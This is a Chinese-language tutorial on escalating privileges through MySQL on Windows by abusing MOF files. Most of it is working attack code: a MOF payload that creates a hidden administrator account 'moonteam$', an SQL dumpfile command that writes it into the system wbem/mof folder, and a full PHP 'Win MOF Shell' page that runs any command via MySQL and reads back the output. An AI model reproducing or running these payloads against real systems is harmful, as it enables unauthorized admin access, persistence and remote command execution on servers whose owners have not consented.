1. mof
托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Studio Analyzer 使用。 在 MOF 文件中创建提供程序、事件类别和事件类的实例,并且定义想要分析的自定义对象,之后,就可以对该文件进行编译
2. 提权原理
mof是Windows系统的一个文件(在C:/windows/system32/wben/mof/nullevt.mof)叫做“托管对象格式”,其作用是每隔五秒就回去监控进程创建和死亡。
在MySQL中拥有root权限后,然后用root的权限上传我们的mof。隔了一定的时间后该mof文件就会被执行,这个mof当中有一段是vbs脚本,这个vbs脚本大多数是cmd的添加管理员用户的命令。
3. 提权过程
mof文件代码(记得改账号密码):
1 #pragma namespace("\\\\.\\root\\subscription") 2 3 instance of __EventFilter as $EventFilter 4 { 5 EventNamespace = "Root\\Cimv2"; 6 Name = "filtP2"; 7 Query = "Select * From __InstanceModificationEvent " 8 "Where TargetInstance Isa \"Win32_LocalTime\" " 9 "And TargetInstance.Second = 5"; 10 QueryLanguage = "WQL"; 11 }; 12 13 instance of ActiveScriptEventConsumer as $Consumer 14 { 15 Name = "consPCSV2"; 16 ScriptingEngine = "JScript"; 17 ScriptText = 18 "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add\")"; 19 }; 20 21 instance of __FilterToConsumerBinding 22 { 23 Consumer = $Consumer; 24 Filter = $EventFilter; 25 };
通过shell将mof文件上传后,使用sql语句导出(MySQL执行)
1 select load_file('C:/Inetpub/wwwroot/www.xxx.com/nullevt.mof') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof';
4. 脚本提权(尽量用脚本,上传到网站根目录)
填写好MySQL的账号密码,进入脚本后再将命令输入执行
1 <?php 2 $path="c:/ini.txt"; 3 session_start(); 4 if(!empty($_POST['submit'])){ 5 setcookie("connect"); 6 setcookie("connect[host]",$_POST['host']); 7 setcookie("connect[user]",$_POST['user']); 8 setcookie("connect[pass]",$_POST['pass']); 9 setcookie("connect[dbname]",$_POST['dbname']); 10 echo "<script>location.href='?action=connect'</script>"; 11 } 12 if(empty($_GET["action"])){ 13 ?> 14 15 <html> 16 17 <head><title>Win MOF Shell</title></head> 18 19 <body> 20 21 <form action="?action=connect" method="post"> 22 Host: 23 <input type="text" name="host" value="192.168.200.144:3306"><br/> 24 User: 25 <input type="text" name="user" value="root"><br/> 26 Pass: 27 <input type="password" name="pass" value="toor"><br/> 28 DB: 29 <input type="text" name="dbname" value="mysql"><br/> 30 <input type="submit" name="submit" value="Submit"><br/> 31 </form> 32 33 </body> 34 </html> 35 36 <?php 37 exit; 38 } 39 if ($_GET[action]=='connect') 40 { 41 $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); 42 echo "<form action='' method='post'>"; 43 echo "Cmd:"; 44 echo "<input type='text' name='cmd' value='$strCmd'?>"; 45 echo "<br>"; 46 echo "<br>"; 47 echo "<input type='submit' value='Exploit'>"; 48 echo "</form>"; 49 echo "<form action='' method='post'>"; 50 echo "<input type='hidden' name='flag' value='flag'>"; 51 echo "<input type='submit'value=' Read '>"; 52 echo "</form>"; 53 if (isset($_POST['cmd'])){ 54 $strCmd=$_POST['cmd']; 55 $cmdshell='cmd /c '.$strCmd.'>'.$path; 56 $mofname="c:/windows/system32/wbem/mof/system.mof"; 57 $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") 58 59 instance of __EventFilter as \$EventFilter 60 { 61 EventNamespace = \"Root\\\\\\\\Cimv2\"; 62 Name = \"filtP2\"; 63 Query = \"Select * From __InstanceModificationEvent \" 64 \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" 65 \"And TargetInstance.Second = 5\"; 66 QueryLanguage = \"WQL\"; 67 }; 68 69 instance of ActiveScriptEventConsumer as \$Consumer 70 { 71 Name = \"consPCSV2\"; 72 ScriptingEngine = \"JScript\"; 73 ScriptText = 74 \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; 75 }; 76 77 instance of __FilterToConsumerBinding 78 { 79 Consumer = \$Consumer; 80 Filter = \$EventFilter; 81 };"; 82 mysql_select_db($_COOKIE["connect"]["dbname"],$conn); 83 $sql1="select '$payload' into dumpfile '$mofname';"; 84 if(mysql_query($sql1)) 85 echo "<hr>Execute Successful!<br> Please click the read button to check the result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); 86 mysql_close($conn); 87 } 88 89 if(isset($_POST['flag'])) 90 { 91 $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); 92 $sql2="select load_file(\"".$path."\");"; 93 $result2=mysql_query($sql2); 94 $num=mysql_num_rows($result2); 95 while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { 96 echo "<hr/>"; 97 echo '<pre>'. $row[0].'</pre>'; 98 } 99 mysql_close($conn); 100 } 101 } 102 ?>